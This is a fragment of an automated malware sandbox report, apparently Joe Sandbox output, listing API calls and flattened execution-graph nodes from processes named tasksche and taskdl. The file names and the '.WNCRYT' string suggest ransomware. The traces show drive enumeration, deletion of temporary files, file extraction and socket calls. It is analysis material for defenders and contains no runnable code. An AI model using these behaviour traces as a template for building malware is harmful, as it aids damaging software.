      • Part of subcall function 10004A40: wcslen.MSVCRT ref: 10004A9E
      • Part of subcall function 10004A40: wcsrchr.MSVCRT ref: 10004AC0
      • Part of subcall function 10004A40: wcschr.MSVCRT ref: 10004AE9
      • Part of subcall function 10004A40: SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,?), ref: 10004B1B
      • Part of subcall function 10004A40: wcslen.MSVCRT ref: 10004B25
      • Part of subcall function 10004A40: wcsrchr.MSVCRT ref: 10004B3D
      • Part of subcall function 10004A40: swprintf.MSVCRT(?,%s\*.*,?), ref: 10004B87
      • Part of subcall function 10004A40: FindFirstFileW.KERNEL32(?,?), ref: 10004BA0
      • Part of subcall function 10004A40: wcscmp.MSVCRT ref: 10004BD7
      • Part of subcall function 10004A40: wcscmp.MSVCRT ref: 10004BF5
      • Part of subcall function 10004A40: swprintf.MSVCRT(?,%s\%s\%s,?,?,-00000002), ref: 10004C2F
      • Part of subcall function 10004A40: wcscmp.MSVCRT ref: 10004C51
      • Part of subcall function 10004A40: swprintf.MSVCRT(?,%s\%s\%s,?,?,00000000), ref: 10004C79
      • Part of subcall function 10004A40: FindNextFileW.KERNEL32(?,?), ref: 10004CA2
      • Part of subcall function 10004A40: FindClose.KERNEL32(?), ref: 10004CB5
      • Part of subcall function 100027F0: ??2@YAPAXI@Z.MSVCRT ref: 1000281A
      • Part of subcall function 100027F0: ??3@YAXPAX@Z.MSVCRT ref: 10002899
      • Part of subcall function 100027F0: ??3@YAXPAX@Z.MSVCRT ref: 100028FD
      • Part of subcall function 100027F0: ??3@YAXPAX@Z.MSVCRT ref: 10002917
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd

    Execution Graph

    Execution Coverage:14.8%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:18.3%
    Total number of Nodes:93
    Total number of Limit Nodes:1

    Graph

    [Execution graph figure: node and edge listing not recoverable as text]

    Executed Functions

    APIs
    • __set_app_type.MSVCRT ref: 00401923
    • __p__fmode.MSVCRT ref: 00401938
    • __p__commode.MSVCRT ref: 00401946
    • __setusermatherr.MSVCRT ref: 00401972
      • Part of subcall function 00401A66: _controlfp.MSVCRT ref: 00401A70
    • _initterm.MSVCRT ref: 00401988
    • __getmainargs.MSVCRT ref: 004019AB
    • _initterm.MSVCRT ref: 004019BB
    • GetStartupInfoA.KERNEL32(?), ref: 004019FA
    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00401A1E
      • Part of subcall function 004012C0: GetLogicalDrives.KERNEL32 ref: 004012C7
      • Part of subcall function 004012C0: GetDriveTypeW.KERNEL32(?,?,?,?,00000000,?,0000000A), ref: 0040130A
      • Part of subcall function 004012C0: Sleep.KERNEL32(0000000A,00000000,?,0000000A), ref: 0040131C
    • exit.MSVCRT ref: 00401A2E
    • _XcptFilter.MSVCRT ref: 00401A40
    Memory Dump Source
    • Source File: 0000000A.00000002.1619051545.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.1619044990.00400000.00000002.sdmp
    • Associated: 0000000A.00000002.1619057686.00402000.00000002.sdmp
    • Associated: 0000000A.00000002.1619064290.00403000.00000004.sdmp
    • Associated: 0000000A.00000002.1619070180.00404000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
    APIs
    • GetLogicalDrives.KERNEL32 ref: 004012C7
    • GetDriveTypeW.KERNEL32(?,?,?,?,00000000,?,0000000A), ref: 0040130A
      • Part of subcall function 00401080: swprintf.MSVCRT(?,%s\*%s,?,.WNCRYT,76E6EEF2,00000000), ref: 004010F5
      • Part of subcall function 00401080: FindFirstFileW.KERNEL32(?,?), ref: 00401107
      • Part of subcall function 00401080: swprintf.MSVCRT(?,%s\%s,?,?), ref: 00401168
      • Part of subcall function 00401080: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00401177
      • Part of subcall function 00401080: wcslen.MSVCRT ref: 00401182
      • Part of subcall function 00401080: ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(00000000,00000001), ref: 00401194
      • Part of subcall function 00401080: ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(00000000), ref: 004011B6
      • Part of subcall function 00401080: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 004011E7
      • Part of subcall function 00401080: FindNextFileW.KERNEL32(00000000,?), ref: 004011F6
      • Part of subcall function 00401080: FindClose.KERNEL32(00000000), ref: 00401205
      • Part of subcall function 00401080: DeleteFileW.KERNEL32(?), ref: 0040123A
      • Part of subcall function 00401080: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401258
      • Part of subcall function 00401080: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401282
    • Sleep.KERNEL32(0000000A,00000000,?,0000000A), ref: 0040131C
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1619051545.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.1619044990.00400000.00000002.sdmp
    • Associated: 0000000A.00000002.1619057686.00402000.00000002.sdmp
    • Associated: 0000000A.00000002.1619064290.00403000.00000004.sdmp
    • Associated: 0000000A.00000002.1619070180.00404000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd

    Non-executed Functions

    APIs
      • Part of subcall function 00401000: GetWindowsDirectoryW.KERNEL32(00000019,00000104,76E6C426,00000019,004010D5,?,?,76E6C426,00000019,76E6EEF2,00000000), ref: 0040100C
      • Part of subcall function 00401000: GetTempPathW.KERNEL32(00000104,00000019), ref: 00401028
      • Part of subcall function 00401000: wcslen.MSVCRT ref: 00401035
      • Part of subcall function 00401000: wcslen.MSVCRT ref: 0040103F
      • Part of subcall function 00401000: wcslen.MSVCRT ref: 0040104D
      • Part of subcall function 00401000: swprintf.MSVCRT(00000019,%C:\%s,?,$RECYCLE), ref: 0040106A
    • swprintf.MSVCRT(?,%s\*%s,?,.WNCRYT,76E6EEF2,00000000), ref: 004010F5
    • FindFirstFileW.KERNEL32(?,?), ref: 00401107
    • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00401168
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00401177
    • wcslen.MSVCRT ref: 00401182
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(00000000,00000001), ref: 00401194
    • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(00000000), ref: 004011B6
      • Part of subcall function 004013D0: ??2@YAPAXI@Z.MSVCRT ref: 00401423
      • Part of subcall function 004013D0: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,00000001,?), ref: 004014C3
      • Part of subcall function 004013D0: ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,768FE87C,00000000,00000000,?,?,00000001,?), ref: 004015C0
      • Part of subcall function 004013D0: ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,768FE87C,00000000,00000000,?,?,00000001,?), ref: 0040163D
      • Part of subcall function 004013D0: ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,768FE87C,00000000,00000000,?,?,00000001,?), ref: 0040166A
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 004011E7
    • FindNextFileW.KERNEL32(00000000,?), ref: 004011F6
    • FindClose.KERNEL32(00000000), ref: 00401205
    • DeleteFileW.KERNEL32(?), ref: 0040123A
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401258
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401282
      • Part of subcall function 004018D0: free.MSVCRT(?,004014D9,?,?,?,00000001,?), ref: 004018D4
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1619051545.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.1619044990.00400000.00000002.sdmp
    • Associated: 0000000A.00000002.1619057686.00402000.00000002.sdmp
    • Associated: 0000000A.00000002.1619064290.00403000.00000004.sdmp
    • Associated: 0000000A.00000002.1619070180.00404000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
    APIs
    • GetWindowsDirectoryW.KERNEL32(00000019,00000104,76E6C426,00000019,004010D5,?,?,76E6C426,00000019,76E6EEF2,00000000), ref: 0040100C
    • GetTempPathW.KERNEL32(00000104,00000019), ref: 00401028
    • wcslen.MSVCRT ref: 00401035
    • wcslen.MSVCRT ref: 0040103F
    • wcslen.MSVCRT ref: 0040104D
    • swprintf.MSVCRT(00000019,%C:\%s,?,$RECYCLE), ref: 0040106A
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1619051545.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.1619044990.00400000.00000002.sdmp
    • Associated: 0000000A.00000002.1619057686.00402000.00000002.sdmp
    • Associated: 0000000A.00000002.1619064290.00403000.00000004.sdmp
    • Associated: 0000000A.00000002.1619070180.00404000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
    APIs
    • ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,768FE87C,00000000,00000000,?,?), ref: 004016EE
    • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,768FE87C,00000000,00000000,?,?), ref: 004016F6
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 0040172D
    • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 0040173A
    • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00401742
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,768FE87C,00000000,00000000,?), ref: 00401779
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,768FE87C,00000000,00000000), ref: 004017BA
    Memory Dump Source
    • Source File: 0000000A.00000002.1619051545.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.1619044990.00400000.00000002.sdmp
    • Associated: 0000000A.00000002.1619057686.00402000.00000002.sdmp
    • Associated: 0000000A.00000002.1619064290.00403000.00000004.sdmp
    • Associated: 0000000A.00000002.1619070180.00404000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 00401423
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,00000001,?), ref: 004014C3
      • Part of subcall function 004018D0: free.MSVCRT(?,004014D9,?,?,?,00000001,?), ref: 004018D4
    • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,768FE87C,00000000,00000000,?,?,00000001,?), ref: 004015C0
    • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,768FE87C,00000000,00000000,?,?,00000001,?), ref: 0040166A
      • Part of subcall function 00401690: ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,768FE87C,00000000,00000000,?,?), ref: 004016EE
      • Part of subcall function 00401690: ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,768FE87C,00000000,00000000,?,?), ref: 004016F6
      • Part of subcall function 00401690: ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 0040172D
      • Part of subcall function 00401690: ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 0040173A
      • Part of subcall function 00401690: ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00401742
      • Part of subcall function 00401690: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,768FE87C,00000000,00000000,?), ref: 00401779
      • Part of subcall function 00401690: ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,768FE87C,00000000,00000000), ref: 004017BA
    • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,768FE87C,00000000,00000000,?,?,00000001,?), ref: 0040163D
    Memory Dump Source
    • Source File: 0000000A.00000002.1619051545.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.1619044990.00400000.00000002.sdmp
    • Associated: 0000000A.00000002.1619057686.00402000.00000002.sdmp
    • Associated: 0000000A.00000002.1619064290.00403000.00000004.sdmp
    • Associated: 0000000A.00000002.1619070180.00404000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd

    Execution Graph

    Execution Coverage:6.3%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:11.6%
    Total number of Nodes:1704
    Total number of Limit Nodes:11

    Graph

LocalFileTimeToFileTime 4949 4120b6 4948->4949 4950 412203 4949->4950 4951 4121fa #825 4949->4951 4950->4878 4951->4950 4953 411acd 4952->4953 4956 411ad6 4952->4956 4953->4924 4954 411add 4954->4924 4955 411b02 free 4958 411b11 4955->4958 4956->4954 4956->4955 4956->4958 4957 411b2a free 4957->4924 4958->4957 4960 4113a0 4959->4960 4961 411399 4959->4961 4962 411000 SetFilePointer SetFilePointer ReadFile 4960->4962 4961->4929 4963 4113c7 4962->4963 4963->4929 4965 4113e9 4964->4965 4966 4113f0 4964->4966 4965->4929 4967 4113f7 4966->4967 4968 411000 SetFilePointer SetFilePointer ReadFile 4966->4968 4967->4929 4969 411444 4968->4969 4969->4929 4971 411000 SetFilePointer SetFilePointer ReadFile 4970->4971 4972 41137f 4971->4972 4973 411460 4972->4973 4974 410a50 SetFilePointer SetFilePointer 4973->4974 4976 411491 4974->4976 4975 411498 4975->4933 4976->4975 4977 410c00 ReadFile 4976->4977 4978 4114af 4977->4978 4979 410bb0 ReadFile 4978->4979 4980 4114d7 4979->4980 4981 410bb0 ReadFile 4980->4981 4982 4114ee 4981->4982 4983 410bb0 ReadFile 4982->4983 4984 411505 4983->4984 4985 410c00 ReadFile 4984->4985 4986 41153b 4985->4986 4987 410c00 ReadFile 4986->4987 4988 411552 4987->4988 4989 410c00 ReadFile 4988->4989 4990 411586 4989->4990 4991 410c00 ReadFile 4990->4991 4992 4115ba 4991->4992 4993 410bb0 ReadFile 4992->4993 4994 4115ee 4993->4994 4995 410bb0 ReadFile 4994->4995 4996 411621 4995->4996 4996->4933 4998 410a5a 4997->4998 4999 410aaa 4997->4999 4998->4999 5000 410a69 SetFilePointer 4998->5000 5001 410a82 4998->5001 4999->4935 5000->4935 5003 410aa4 5001->5003 5004 410a87 SetFilePointer 5001->5004 5003->4935 5004->4935 5006 410b31 5005->5006 5007 410b07 ReadFile 5005->5007 5006->4939 5008 410b22 5007->5008 5008->4939 5009->4948 5011 4129a3 5010->5011 5012 412998 5010->5012 5013 4129a8 5011->5013 5016 412360 5011->5016 5012->4881 5013->4881 5015 4129cf 5015->4881 5018 41239c 5016->5018 5020 412378 5016->5020 5017 41240e 5019 411810 SetFilePointer 
SetFilePointer ReadFile 5017->5019 5018->5017 5023 411ac0 free free 5018->5023 5030 4123b7 5018->5030 5027 412431 5019->5027 5021 41238a 5020->5021 5025 411ac0 free free 5020->5025 5029 4124ab 5020->5029 5021->5015 5022 4123c8 5022->5015 5023->5030 5024 4124bf 5024->5015 5025->5029 5026 4124dc 5034 4124f6 5026->5034 5039 4113e0 SetFilePointer SetFilePointer ReadFile 5026->5039 5028 412442 5027->5028 5031 411ac0 free free 5027->5031 5028->5015 5029->5024 5029->5026 5032 411390 SetFilePointer SetFilePointer ReadFile 5029->5032 5030->5022 5035 411390 SetFilePointer SetFilePointer ReadFile 5030->5035 5041 4123e5 5030->5041 5031->5028 5032->5026 5033 4123ff 5036 411660 8 API calls 5033->5036 5037 411cf0 14 API calls 5034->5037 5035->5041 5036->5017 5040 412506 5037->5040 5038 4113e0 SetFilePointer SetFilePointer ReadFile 5038->5041 5039->5026 5051 412510 5040->5051 5055 412578 5040->5055 5041->5033 5041->5038 5042 412515 5042->5015 5043 41257d 5046 412637 5043->5046 5052 411660 8 API calls 5043->5052 5044 41253f 5045 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5044->5045 5048 412547 5045->5048 5046->5015 5047 4125da 5053 4125df wsprintfA 5047->5053 5048->5015 5049 412671 wsprintfA 5054 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5049->5054 5050 412559 5057 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5050->5057 5051->5042 5051->5044 5051->5050 5058 4126ad 5052->5058 5056 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5053->5056 5059 41260a CreateFileA 5054->5059 5055->5043 5055->5047 5055->5049 5055->5053 5056->5059 5060 412566 5057->5060 5061 4126ba #823 5058->5061 5065 4126cd 5058->5065 5059->5043 5060->5015 5061->5065 5063 411810 SetFilePointer SetFilePointer ReadFile 5063->5065 5064 412728 5067 412776 5064->5067 5068 41276f CloseHandle 5064->5068 5065->5063 5065->5064 5066 412704 WriteFile 5065->5066 5069 412746 SetFileTime 
5065->5069 5066->5065 5070 412732 5066->5070 5071 411ac0 free free 5067->5071 5068->5067 5069->5064 5070->5064 5072 41277e 5071->5072 5072->5015 5074 4127a9 5073->5074 5077 4127b1 5073->5077 5075 411ac0 2 API calls 5074->5075 5075->5077 5078 4127c7 5077->5078 5079 410f70 5077->5079 5078->4887 5078->4889 5078->4890 5080 410f79 5079->5080 5081 410f80 5079->5081 5080->5078 5082 411ac0 free free 5081->5082 5084 410f8d 5081->5084 5082->5084 5083 4109c0 CloseHandle #825 5085 410f98 free 5083->5085 5084->5083 5085->5078 5088 40d8ec 5086->5088 5087 40daad closesocket 5089 40baa8 5087->5089 5088->5087 5088->5089 5089->4742 5091 40c9f6 #823 5090->5091 5093 40ca40 5091->5093 5094 40ca87 #825 5093->5094 5095 40ca81 5093->5095 5094->5095 5095->4803 5097 40cb00 5096->5097 5108 40cbf3 5096->5108 5098 40cb26 5097->5098 5104 40cb90 5097->5104 5100 40cb31 5098->5100 5101 40cb2c ?_Xran@std@ 5098->5101 5099 40cbe9 5102 40cc60 5 API calls 5099->5102 5115 40cd80 5100->5115 5101->5100 5102->5108 5104->5099 5106 40cbaa 5104->5106 5105 40cb38 5107 40cb47 memmove 5105->5107 5114 40cb6a 5105->5114 5109 40c7b0 #825 5106->5109 5132 40cc60 5107->5132 5108->4812 5112 40cbb3 5109->5112 5111 40cd80 4 API calls 5113 40cb7d 5111->5113 5112->4812 5113->4812 5114->5111 5116 40cd93 5115->5116 5128 40ce27 5115->5128 5117 40cdd0 5116->5117 5118 40cdc9 ?_Xlen@std@ 5116->5118 5116->5128 5119 40cdf8 5117->5119 5121 40cde2 5117->5121 5118->5117 5120 40cdfc 5119->5120 5122 40ce0a 5119->5122 5123 40c7b0 #825 5120->5123 5124 40ce1f 5121->5124 5125 40cde6 5121->5125 5126 40c7b0 #825 5122->5126 5122->5128 5127 40ce05 5123->5127 5130 40c9c0 2 API calls 5124->5130 5129 40c7b0 #825 5125->5129 5126->5124 5127->5105 5128->5105 5131 40cdf3 5129->5131 5130->5128 5131->5105 5133 40cc6e ?_Xlen@std@ 5132->5133 5134 40cc73 5132->5134 5133->5134 5135 40cd04 5134->5135 5137 40cc88 5134->5137 5140 40ccae 5134->5140 5135->5137 5143 40cd08 5135->5143 5136 40ccc4 5136->5114 5138 40cc90 5137->5138 5142 40c9c0 2 API calls 
5137->5142 5138->5114 5139 40cd4c 5145 40c9c0 2 API calls 5139->5145 5140->5136 5141 40ccd9 #825 5140->5141 5141->5136 5142->5138 5143->5138 5143->5139 5144 40cd43 #825 5143->5144 5146 40cd26 5143->5146 5144->5139 5147 40cd5d 5145->5147 5148 40c9c0 2 API calls 5146->5148 5147->5114 5149 40cd3b 5148->5149 5149->5114 5150->4776 5151->4776 5153 412af5 5152->5153 5154 412ac8 free 5152->5154 5153->4733 5154->5153 5733 406ef0 5734 406f03 #823 5733->5734 5735 406f6a 5733->5735 5734->5735 5737 406f25 SendMessageA ShellExecuteA #825 5734->5737 5737->5735 5176 40dad0 5177 40dadf setsockopt send shutdown closesocket 5176->5177 5178 40db33 5176->5178 5177->5178 5929 404150 5934 404170 #2414 #800 #800 #795 5929->5934 5931 404158 5932 40415f #825 5931->5932 5933 404168 5931->5933 5932->5933 5934->5931 5738 404410 SetCursor 5935 407650 5936 40765e 5935->5936 5940 407670 5935->5940 5937 4076a0 20 API calls 5936->5937 5939 407665 #2379 5937->5939 5938 407690 #2379 5940->5938 5941 40b620 9 API calls 5940->5941 5942 40768d 5941->5942 5942->5938 6095 401f10 6100 401f30 6095->6100 6098 401f28 6099 401f1f #825 6099->6098 6107 401fa0 6100->6107 6102 401f60 6116 404690 DeleteCriticalSection 6102->6116 6104 401f7a 6117 404690 DeleteCriticalSection 6104->6117 6106 401f18 6106->6098 6106->6099 6108 404770 3 API calls 6107->6108 6109 401fac 6108->6109 6110 404770 3 API calls 6109->6110 6112 401fb4 6110->6112 6111 40200c 6111->6102 6112->6112 6113 401fe3 6112->6113 6114 401fd0 GlobalFree 6112->6114 6113->6111 6113->6113 6115 401ff9 GlobalFree 6113->6115 6114->6113 6115->6111 6116->6104 6117->6106 5739 4059f0 5740 4059f8 5739->5740 5741 405a08 5740->5741 5742 4059ff #825 5740->5742 5742->5741 6118 409a40 6122 409d40 6118->6122 6121 409ae7 #2414 #2414 6123 409a87 OffsetRect CreateRectRgn #1641 #5781 6122->6123 6123->6121 5743 408580 #609 5744 40858f #825 5743->5744 5745 408598 5743->5745 5744->5745 5943 404d90 #2370 #2289 6320 40dbd0 6321 40dbf0 free 6320->6321 6322 40dbd8 6321->6322 6323 40dbe8 
6322->6323 6324 40dbdf #825 6322->6324 6324->6323 5746 4090f0 5747 409124 #540 #3874 5746->5747 5748 40971e 5746->5748 5749 409185 5747->5749 5752 40915e 5747->5752 5750 40918e #860 5749->5750 5751 40919c _ftol 5749->5751 5750->5751 5755 40917c 5751->5755 5752->5755 5756 40916e #860 5752->5756 5753 40970a #800 5753->5748 5754 4091d5 SendMessageA #2860 5757 409208 5754->5757 5755->5753 5755->5754 5756->5755 5772 409870 5757->5772 5759 409232 #5875 #6170 GetWindowOrgEx #540 #2818 5761 409329 GetObjectA 5759->5761 5762 40935b GetTextExtentPoint32A 5759->5762 5761->5762 5764 40938b GetViewportOrgEx 5762->5764 5765 409411 5764->5765 5766 409630 #800 5765->5766 5767 40965a #6170 5766->5767 5768 409662 5766->5768 5767->5768 5769 40967d #5875 5768->5769 5771 409685 #2414 #2414 5768->5771 5769->5771 5771->5753 5773 409880 #2414 5772->5773 5773->5759 5775 404050 #616 5776 40405f #825 5775->5776 5777 404068 5775->5777 5776->5777 5778 409c20 #3797 5779 409c36 5778->5779 5780 409c40 #6734 5778->5780 5781 409c5b SendMessageA 5780->5781 5782 409c78 5780->5782 5781->5782 5783 409ce4 5782->5783 5785 409caa 5782->5785 5784 409ce8 InvalidateRect 5783->5784 5786 409cf6 5783->5786 5784->5786 5787 409cc4 #4284 5785->5787 5788 409cd4 #4284 5785->5788 5787->5786 5788->5786 5789 4102d0 free 6325 40a0a0 6326 40a0a8 6325->6326 6327 40a0ab GrayStringA 6325->6327 6326->6327 6328 403810 WideCharToMultiByte 6331 403e60 SendMessageA #3998 SendMessageA 6328->6331 6330 403845 6331->6330 5790 404430 5791 40447b 5790->5791 5792 40443d _TrackMouseEvent #2379 5790->5792 5795 404489 5791->5795 5797 404530 5791->5797 5796 4044a1 SetCursor #2379 5795->5796 5798 404552 5797->5798 5799 4045c1 5797->5799 5798->5799 5800 404559 #289 #5789 GetTextExtentPoint32A #5789 #613 5798->5800 5799->5795 5800->5799 6332 409b70 #2379 6130 403180 6135 4031a0 #2414 #2414 #616 #693 #641 6130->6135 6132 403188 6133 40318f #825 6132->6133 6134 403198 6132->6134 6133->6134 6135->6132 5801 4085a0 #781 5802 4085af #825 5801->5802 
5803 4085b8 5801->5803 5802->5803 5804 403f70 5809 403f90 #2414 5804->5809 5806 403f78 5807 403f88 5806->5807 5808 403f7f #825 5806->5808 5808->5807 5809->5806 5810 4059d0 #561 5944 408c20 5949 408b40 5944->5949 5946 408c28 5947 408c2f #825 5946->5947 5948 408c38 5946->5948 5947->5948 5950 408bd0 5949->5950 5953 408b78 BitBlt 5949->5953 5951 408bd6 #2414 #640 5950->5951 5951->5946 5954 408bb5 #5785 5953->5954 5955 408bc1 #5785 5953->5955 5954->5951 5955->5951 6136 40d630 6141 40d650 6136->6141 6138 40d638 6139 40d63f #825 6138->6139 6140 40d648 6138->6140 6139->6140 6142 40dad0 4 API calls 6141->6142 6143 40d680 6142->6143 6143->6138 5811 404070 #693 5812 40407f #825 5811->5812 5813 404088 5811->5813 5812->5813 5814 403f00 5819 403f20 #2414 5814->5819 5816 403f08 5817 403f18 5816->5817 5818 403f0f #825 5816->5818 5818->5817 5819->5816 6144 40cfe0 6151 40d4c0 6144->6151 6146 40cffb 6147 40d4c0 4 API calls 6146->6147 6150 40d05e 6146->6150 6148 40d031 6147->6148 6149 40d4c0 4 API calls 6148->6149 6148->6150 6149->6150 6152 40d4d0 6151->6152 6153 40d4d9 6151->6153 6152->6146 6154 40d4e4 6153->6154 6155 40d4ee time 6153->6155 6154->6146 6156 40d575 6155->6156 6160 40d50a 6155->6160 6157 40d58a 6156->6157 6158 40d2b0 memmove 6156->6158 6157->6146 6158->6157 6159 40d569 time 6159->6156 6159->6160 6160->6156 6160->6159 6161 40d551 Sleep 6160->6161 6161->6160 4642 4102b0 calloc 5956 409920 5961 4098c0 5956->5961 5959 40992f #825 5960 409938 5959->5960 5962 4098fb 5961->5962 5963 4098f2 #5875 5961->5963 5962->5959 5962->5960 5963->5962 5964 4032c0 6 API calls 5965 403334 SendMessageA #3092 5964->5965 5967 40335c SendMessageA #3092 5965->5967 5969 40337b SendMessageA #3092 5967->5969 5971 4033a0 SendMessageA 5969->5971 5972 40339d 5969->5972 5975 403cb0 FindFirstFileA 5971->5975 5972->5971 5974 4033b2 SendMessageA #3996 SendMessageA 5976 403cd9 5975->5976 5977 403ce3 5975->5977 5976->5974 5978 403e1f FindNextFileA 5977->5978 5980 403d14 sscanf 5977->5980 5978->5977 5979 
